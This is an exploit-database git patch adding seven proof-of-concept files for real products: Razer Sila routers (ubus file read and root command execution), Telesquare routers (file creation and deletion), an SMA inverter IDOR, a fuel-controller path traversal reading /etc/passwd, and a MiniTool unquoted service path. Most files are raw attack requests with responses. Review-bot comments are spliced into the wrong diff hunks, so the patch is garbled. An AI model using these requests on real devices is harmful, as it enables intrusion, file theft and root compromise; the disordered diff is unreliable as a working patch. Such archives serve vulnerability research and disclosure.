From 6457d1796d5d98f99f97cfc01aacc0ad708f3706 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 12 Apr 2022 05:01:35 +0000
Subject: [PATCH] DB: 2022-04-12 7 changes to exploits/shellcodes MiniTool Partition Wizard - Unquoted Service Path Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) Telesquare TLR-2855KS6 - Arbitrary File Creation Telesquare TLR-2855KS6 - Arbitrary File Deletion Razer Sila - Local File Inclusion (LFI) Razer Sila - Command Injection
---
 exploits/hardware/webapps/50860.txt | 35 +++++++++++++++++
 exploits/hardware/webapps/50862.txt | 22 +++++++++++
 exploits/hardware/webapps/50863.txt | 23 +++++++++++
 exploits/hardware/webapps/50864.txt | 36 +++++++++++++++++
 exploits/hardware/webapps/50865.txt | 61 +++++++++++++++++++++++++++++
 exploits/linux/remote/50861.txt | 26 ++++++++++++
 exploits/windows/local/50859.txt | 31 +++++++++++++++
 files_exploits.csv | 7 ++++
 8 files changed, 241 insertions(+)
 create mode 100644 exploits/hardware/webapps/50860.txt
 create mode 100644 exploits/hardware/webapps/50862.txt
 create mode 100644 exploits/hardware/webapps/50863.txt
 create mode 100644 exploits/hardware/webapps/50864.txt
 create mode 100644 exploits/hardware/webapps/50865.txt
 create mode 100644 exploits/linux/remote/50861.txt
 create mode 100644 exploits/windows/local/50859.txt
diff --git a/exploits/hardware/webapps/50860.txt b/exploits/hardware/webapps/50860.txt
new file mode 100644
index 000000000..8fef3c84f
--- /dev/null
+++ b/exploits/hardware/webapps/50860.txt
@@ -0,0 +1,35 @@
+# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.sma.de
+# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46416
+
+# Proof of Concept
+
+============[ Normal user request ]============
+
+GET / HTTP/1.1
+Host: 192.168.1.4
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
+Upgrade-Insecure-Requests: 1
+
+============[ Manipulated username request ]============
+
+GET / HTTP/1.1
+Host: 192.168.1.4
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50862.txt b/exploits/hardware/webapps/50862.txt
new file mode 100644
index 000000000..9c4633d7f
--- /dev/null
+++ b/exploits/hardware/webapps/50862.txt
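Review bot: The PoC gives two requests but no responses, so the file never shows what changing `username` from `861` to `850` in the `user443` cookie actually yields; without the two differing response bodies a reader cannot distinguish an IDOR from a value the server simply ignores. Add the HTTP response (or at least a one-line description of the other user's data that came back) after each request. The same cookie also carries `role.bitMask`, `title` and `loginLevel` client-side and the PoC leaves those untouched — a sentence stating whether they were tested as well would make clear whether this is only a username-scoped IDOR or a broader client-side authorization problem. The `sid` is kept identical in both requests, so the finding presumably relies on the server not binding the session to the username; that precondition is worth stating explicitly.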
@@ -0,0 +1,22 @@
+# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: http://www.telesquare.co.kr/
+# Version: TLR-2855KS6
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46418
+
+# Proof of Concept
+
+PUT /cgi-bin/testing_cve.txt HTTP/1.1
+Host: 192.168.1.5
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: nonce=1642692359833588
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50863.txt b/exploits/hardware/webapps/50863.txt
new file mode 100644
index 000000000..97a13c546
--- /dev/null
+++ b/exploits/hardware/webapps/50863.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: http://www.telesquare.co.kr/
+# Version: TLR-2855KS6
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46419
+
+# Proof of Concept
+
+DELETE /cgi-bin/test.cgi HTTP/1.1
+Host: 192.168.1.5
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 438
+Origin: http://192.168.1.5
+DNT: 1
+Connection: close
+Referer: http://192.168.1.5/
+Cookie: nonce=16426923592222
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50864.txt b/exploits/hardware/webapps/50864.txt
new file mode 100644
index 000000000..bed46238f
--- /dev/null
+++ b/exploits/hardware/webapps/50864.txt
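Review bot: The PUT request declares `Content-Length: 32` but the file ends at that header, so the 32-byte body that becomes `/cgi-bin/testing_cve.txt` is missing and the PoC cannot be reproduced as written. Add the body and the server's response (at least the status line), plus a follow-up `GET /cgi-bin/testing_cve.txt` showing the content was persisted. The `nonce` cookie is the only credential-like token in the request; state whether it is required and how it was obtained, or whether an unauthenticated PUT also succeeds, since that determines the severity of CVE-2021-46418.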
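Review bot: The DELETE carries `Content-Length: 438` with no body following and no response is shown, so it is unclear whether deleting `/cgi-bin/test.cgi` depends on body parameters or on the verb alone. Either include the body or change the header to `Content-Length: 0` if the body is irrelevant, and add the server response together with a confirming `GET /cgi-bin/test.cgi` that returns 404. Whether the `nonce` cookie is needed for the request to succeed should also be stated, as it decides whether CVE-2021-46419 is pre- or post-authentication.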
@@ -0,0 +1,36 @@
+# Exploit Title: Razer Sila - Local File Inclusion (LFI)
+# Google Dork: N/A
+# Date: 4/9/2022
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Version: RazerSila-2.0.441_api-2.0.418
+# Tested on: Razer Sila Router
+# CVE N/A
+
+# Proof of Concept
+
+# Request
+POST /ubus/ HTTP/1.1
+Host: 192.168.8.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 123
+Origin: https://192.168.8.1
+Referer: https://192.168.8.1/
+Te: trailers
+Connection: close
+
+{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
+
+# Reponse
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: application/json
+Content-Length: 537
+
+{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50865.txt b/exploits/hardware/webapps/50865.txt
new file mode 100644
index 000000000..b68744fe0
--- /dev/null
+++ b/exploits/hardware/webapps/50865.txt
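Review bot: The request is a ubus JSON-RPC call to the `file` object's `read` method with an attacker-chosen `path`, which is an arbitrary file read exposed through the ubus ACL rather than a Local File Inclusion; the title and the matching `files_exploits.csv` row would be more accurate as `Arbitrary File Read (ubus file.read)`. The first element of `params`, `4183f72884a98d7952d953dd9439a1d1`, is a ubus session id and the file never says where it comes from — if it is a logged-in admin session the issue is post-auth, if `/ubus/` accepts it without a prior login it is far more serious, and the advisory currently lets the reader guess. Add a line such as `# Session id: obtained from <login call / accepted without authentication>` before the request so the precondition is explicit. `# Reponse` is a typo for `# Response`.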
@@ -0,0 +1,61 @@
+# Exploit Title: Razer Sila - Command Injection
+# Google Dork: N/A
+# Date: 4/9/2022
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Version: RazerSila-2.0.441_api-2.0.418
+# Tested on: Razer Sila Router
+# CVE N/A
+
+# Proof of Concept
+
+# Request
+POST /ubus/ HTTP/1.1
+Host: 192.168.8.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 117
+Origin: https://192.168.8.1
+Referer: https://192.168.8.1/
+Te: trailers
+Connection: close
+
+{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
+
+# Response
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: application/json
+Content-Length: 85
+
+{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]}
+
+# Request
+POST /ubus/ HTTP/1.1
+Host: 192.168.8.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 117
+Origin: https://192.168.8.1
+Referer: https://192.168.8.1/
+Te: trailers
+Connection: close
+
+{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]}
+
+# Response
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: application/json
+Content-Length: 172
+
+{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
\ No newline at end of file
diff --git a/exploits/linux/remote/50861.txt b/exploits/linux/remote/50861.txt
new file mode 100644
index 000000000..2a8c968e6
--- /dev/null
+++ b/exploits/linux/remote/50861.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.franklinfueling.com/
+# Version: 1.8.19.8580
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46417
+
+# Proof of Concept
+
+============[ HTTP Exploitation ]============
+
+GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
+Host: 192.168.1.6
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
+Upgrade-Insecure-Requests: 1
+
+============[ URL Exploitation ]============
+
+http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
\ No newline at end of file
diff --git a/exploits/windows/local/50859.txt b/exploits/windows/local/50859.txt
new file mode 100644
index 000000000..7704e4c16
--- /dev/null
+++ b/exploits/windows/local/50859.txt
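Review bot: What the PoC exercises is the ubus `file` object's `exec` method being callable with the supplied session id and running the given command as root (`uid=0(root) gid=0(root)` in the first response) — that is direct remote command execution through an over-permissive ubus ACL, not injection of shell metacharacters into some other parameter, so the title and the `files_exploits.csv` row would be more accurate as `Remote Command Execution (ubus file.exec, root)`. The session id `30ebdc7dd1f519beb4b2175e9dd8463e` appears without any statement of how it was obtained; a line such as `# Session id: <from login call / accepted without authentication>` would tell the reader whether this is pre- or post-auth root RCE, which is the single most important fact about the finding. The second request/response pair (`ls`) proves nothing the `id` call does not and could be replaced by the login exchange that yields the session.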
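Review bot: The request reads `/etc/passwd` by `../` traversal in the `file_name` parameter of `tsaupload.cgi`, which is path traversal / arbitrary file read rather than Local File Inclusion; the title and the matching `files_exploits.csv` description should say so. The `&password=` parameter is sent empty and the file neither explains it nor shows the response, so it is unclear whether the CGI has a password check that an empty value bypasses or no check at all — one sentence on that, plus the response body, would fix the severity of CVE-2021-46417 for readers. The long `Prefs` cookie looks like UI preferences and is probably irrelevant to the bug; either say it is not required or drop it so nobody assumes it is part of the exploit.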
@@ -0,0 +1,31 @@
+# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
+# Date: 07/04/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.minitool.com/
+# Software Link: https://www.minitool.com/download-center/
+# Version: 12.0
+# Tested: Windows 10 Pro x64 es
+
+# PoC :
+
+C:\Users\saudh>sc qc MTSchedulerService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: MTSchedulerService
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : MTSchedulerService
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"
+
+C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Users:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fa0021d05..2d0b7ac61 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
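Review bot: The evidence does not establish exploitability — the `icacls` check is run on `SchedulerService.exe` itself, where `BUILTIN\Users:(I)(RX)` shows users cannot modify the binary, but an unquoted-path attack needs write access to a parent directory so that `C:\Program.exe` or `C:\Program Files\MiniTool.exe` can be planted; replace that check with `icacls C:\` and `icacls "C:\Program Files"` (both are typically not writable by standard users on a default Windows 10 install, so the finding is doubtful unless the installer relaxes those ACLs). The title says `MiniTool Partition Wizard` while `BINARY_PATH_NAME` points into `C:\Program Files\MiniTool ShadowMaker\`, so either the title and the `files_exploits.csv` row name the wrong product or the PoC was taken from a different installation. The `LocalSystem` / `AUTO_START` lines are what make the issue worth reporting if a writable parent directory is found, and a sentence saying so would help the reader.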
@@ -11476,6 +11476,7 @@ id,file,description,date,author,type,platform,port
 50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows,
 50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
 50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
+50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18662,6 +18663,7 @@ id,file,description,date,author,type,platform,port
 50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware,
 50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
 50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
+50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44926,3 +44928,8 @@ id,file,description,date,author,type,platform,port
 50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
 50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php,
 50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php,
+50860,exploits/hardware/webapps/50860.txt,"SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)",1970-01-01,"Momen Eldawakhly",webapps,hardware,
+50862,exploits/hardware/webapps/50862.txt,"Telesquare TLR-2855KS6 - Arbitrary File Creation",1970-01-01,"Momen Eldawakhly",webapps,hardware,
+50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware,
+50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware,
+50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,